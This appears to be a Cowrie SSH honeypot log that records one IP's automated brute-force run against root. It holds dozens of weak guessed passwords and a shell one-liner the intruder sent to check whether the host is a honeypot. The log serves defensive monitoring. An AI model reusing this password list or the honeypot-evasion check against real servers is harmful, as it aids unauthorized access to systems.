{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.365976Z","src_ip":"212.227.235.229","session":"68649c787464"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.367583Z","src_ip":"212.227.235.229","session":"9c9b2fe796ea"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.369017Z","src_ip":"212.227.235.229","session":"feef673ead57"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53742,"dst_ip":"1.2.3.4","dst_port":22,"session":"7775e0f24ab6","protocol":"ssh","message":"New connection: 212.227.235.229:53742 (1.2.3.4:22) [session: 7775e0f24ab6]","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.387637Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.388408Z","src_ip":"212.227.235.229","session":"7775e0f24ab6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53744,"dst_ip":"1.2.3.4","dst_port":22,"session":"d35ca48cc309","protocol":"ssh","message":"New connection: 212.227.235.229:53744 (1.2.3.4:22) [session: d35ca48cc309]","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.389222Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.389922Z","src_ip":"212.227.235.229","session":"d35ca48cc309"}
{"eventid":"cowrie.login.success","username":"root","password":"00008888","message":"login attempt [root/00008888] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.474182Z","src_ip":"212.227.235.229","session":"6c3f25e485f7"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.479098Z","src_ip":"212.227.235.229","session":"7775e0f24ab6"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.481026Z","src_ip":"212.227.235.229","session":"d35ca48cc309"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53750,"dst_ip":"1.2.3.4","dst_port":22,"session":"6eb2dbeee33c","protocol":"ssh","message":"New connection: 212.227.235.229:53750 (1.2.3.4:22) [session: 6eb2dbeee33c]","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.482934Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.483496Z","src_ip":"212.227.235.229","session":"6eb2dbeee33c"}
{"eventid":"cowrie.login.success","username":"root","password":"00000000","message":"login attempt [root/00000000] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.491325Z","src_ip":"212.227.235.229","session":"147f84deb372"}
{"eventid":"cowrie.login.success","username":"root","password":"40404040","message":"login attempt [root/40404040] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.492549Z","src_ip":"212.227.235.229","session":"d52b7d612bcc"}
{"eventid":"cowrie.login.success","username":"root","password":"12131415","message":"login attempt [root/12131415] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.494438Z","src_ip":"212.227.235.229","session":"5b7eec3666f9"}
{"eventid":"cowrie.login.success","username":"root","password":"10101010","message":"login attempt [root/10101010] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.500249Z","src_ip":"212.227.235.229","session":"6329d650a758"}
{"eventid":"cowrie.login.success","username":"root","password":"12341234","message":"login attempt [root/12341234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.501578Z","src_ip":"212.227.235.229","session":"028f6e8023d2"}
{"eventid":"cowrie.login.success","username":"root","password":"00006666","message":"login attempt [root/00006666] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.503160Z","src_ip":"212.227.235.229","session":"2a6ce3bd4ad0"}
{"eventid":"cowrie.login.success","username":"root","password":"10203040","message":"login attempt [root/10203040] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.506527Z","src_ip":"212.227.235.229","session":"9137ff58763c"}
{"eventid":"cowrie.login.success","username":"root","password":"708090100","message":"login attempt [root/708090100] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.508142Z","src_ip":"212.227.235.229","session":"e567462e10a0"}
{"eventid":"cowrie.login.success","username":"root","password":"100010001000","message":"login attempt [root/100010001000] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.510942Z","src_ip":"212.227.235.229","session":"ef56073f4f78"}
{"eventid":"cowrie.login.success","username":"root","password":"00005555","message":"login attempt [root/00005555] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.512369Z","src_ip":"212.227.235.229","session":"b530836b47a8"}
{"eventid":"cowrie.login.success","username":"root","password":"00004444","message":"login attempt [root/00004444] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.514815Z","src_ip":"212.227.235.229","session":"0e219f0fda44"}
{"eventid":"cowrie.login.success","username":"root","password":"00009999","message":"login attempt [root/00009999] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.516040Z","src_ip":"212.227.235.229","session":"d989ad86cb36"}
{"eventid":"cowrie.login.success","username":"root","password":"80808080","message":"login attempt [root/80808080] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.518326Z","src_ip":"212.227.235.229","session":"d947c8223b05"}
{"eventid":"cowrie.login.success","username":"root","password":"70707070","message":"login attempt [root/70707070] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.520268Z","src_ip":"212.227.235.229","session":"0c96c6da19cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53762,"dst_ip":"1.2.3.4","dst_port":22,"session":"cae0391be97c","protocol":"ssh","message":"New connection: 212.227.235.229:53762 (1.2.3.4:22) [session: cae0391be97c]","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.563546Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.564079Z","src_ip":"212.227.235.229","session":"cae0391be97c"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.573755Z","src_ip":"212.227.235.229","session":"6eb2dbeee33c"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.582793Z","src_ip":"212.227.235.229","session":"147f84deb372"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.583608Z","src_ip":"212.227.235.229","session":"d52b7d612bcc"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.584577Z","src_ip":"212.227.235.229","session":"5b7eec3666f9"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.592310Z","src_ip":"212.227.235.229","session":"6329d650a758"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.593026Z","src_ip":"212.227.235.229","session":"028f6e8023d2"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.596267Z","src_ip":"212.227.235.229","session":"2a6ce3bd4ad0"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.600746Z","src_ip":"212.227.235.229","session":"e567462e10a0"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.601689Z","src_ip":"212.227.235.229","session":"9137ff58763c"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.604087Z","src_ip":"212.227.235.229","session":"ef56073f4f78"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.605272Z","src_ip":"212.227.235.229","session":"b530836b47a8"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.608251Z","src_ip":"212.227.235.229","session":"0e219f0fda44"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.609000Z","src_ip":"212.227.235.229","session":"d989ad86cb36"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.612084Z","src_ip":"212.227.235.229","session":"0c96c6da19cd"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.612707Z","src_ip":"212.227.235.229","session":"d947c8223b05"}
{"eventid":"cowrie.login.success","username":"root","password":"90909090","message":"login attempt [root/90909090] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.624873Z","src_ip":"212.227.235.229","session":"3ca5bc3527ff"}
{"eventid":"cowrie.login.success","username":"root","password":"50505050","message":"login attempt [root/50505050] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.631107Z","src_ip":"212.227.235.229","session":"58e345702d6c"}
{"eventid":"cowrie.login.success","username":"root","password":"12340000","message":"login attempt [root/12340000] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.632400Z","src_ip":"212.227.235.229","session":"89ba776fecc2"}
{"eventid":"cowrie.login.success","username":"root","password":"00001111","message":"login attempt [root/00001111] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.634656Z","src_ip":"212.227.235.229","session":"c81351122c29"}
{"eventid":"cowrie.login.success","username":"root","password":"20202020","message":"login attempt [root/20202020] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.637877Z","src_ip":"212.227.235.229","session":"516fcfab2be1"}
{"eventid":"cowrie.login.success","username":"root","password":"@12345678","message":"login attempt [root/@12345678] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.639557Z","src_ip":"212.227.235.229","session":"68649c787464"}
{"eventid":"cowrie.login.success","username":"root","password":"00002222","message":"login attempt [root/00002222] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.641740Z","src_ip":"212.227.235.229","session":"48b7b4edc509"}
{"eventid":"cowrie.login.success","username":"root","password":"30303030","message":"login attempt [root/30303030] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.642901Z","src_ip":"212.227.235.229","session":"9c9b2fe796ea"}
{"eventid":"cowrie.login.success","username":"root","password":"60606060","message":"login attempt [root/60606060] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.644531Z","src_ip":"212.227.235.229","session":"feef673ead57"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:42:49.669634Z","src_ip":"212.227.235.229","session":"6c3f25e485f7"}
{"eventid":"cowrie.command.input","input":"cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","message":"CMD: cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.670349Z","src_ip":"212.227.235.229","session":"6c3f25e485f7"}
{"eventid":"cowrie.command.input","input":"grep model name /proc/cpuinfo 2 > /dev/null","message":"CMD: grep model name /proc/cpuinfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.671169Z","src_ip":"212.227.235.229","session":"6c3f25e485f7"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.673309Z","src_ip":"212.227.235.229","session":"6c3f25e485f7"}
{"eventid":"cowrie.command.input","input":"grep MemTotal /proc/meminfo 2 > /dev/null","message":"CMD: grep MemTotal /proc/meminfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.674050Z","src_ip":"212.227.235.229","session":"6c3f25e485f7"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.675425Z","src_ip":"212.227.235.229","session":"6c3f25e485f7"}
{"eventid":"cowrie.command.failed","input":"if [ -z ]","message":"Command not found: if [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.676366Z","src_ip":"212.227.235.229","session":"6c3f25e485f7"}
{"eventid":"cowrie.command.failed","input":"[ -z ]","message":"Command not found: [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.677987Z","src_ip":"212.227.235.229","session":"6c3f25e485f7"}
{"eventid":"cowrie.command.failed","input":"then","message":"Command not found: then","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.678915Z","src_ip":"212.227.235.229","session":"6c3f25e485f7"}
{"eventid":"cowrie.command.failed","input":"else","message":"Command not found: else","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.679757Z","src_ip":"212.227.235.229","session":"6c3f25e485f7"}
{"eventid":"cowrie.command.failed","input":"fi","message":"Command not found: fi","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.680695Z","src_ip":"212.227.235.229","session":"6c3f25e485f7"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.682937Z","src_ip":"212.227.235.229","session":"cae0391be97c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.715688Z","src_ip":"212.227.235.229","session":"3ca5bc3527ff"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.721181Z","src_ip":"212.227.235.229","session":"58e345702d6c"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.723199Z","src_ip":"212.227.235.229","session":"89ba776fecc2"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.726554Z","src_ip":"212.227.235.229","session":"c81351122c29"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.729213Z","src_ip":"212.227.235.229","session":"516fcfab2be1"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.731436Z","src_ip":"212.227.235.229","session":"68649c787464"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.733346Z","src_ip":"212.227.235.229","session":"48b7b4edc509"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.737629Z","src_ip":"212.227.235.229","session":"9c9b2fe796ea"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:42:49.738604Z","src_ip":"212.227.235.229","session":"feef673ead57"}
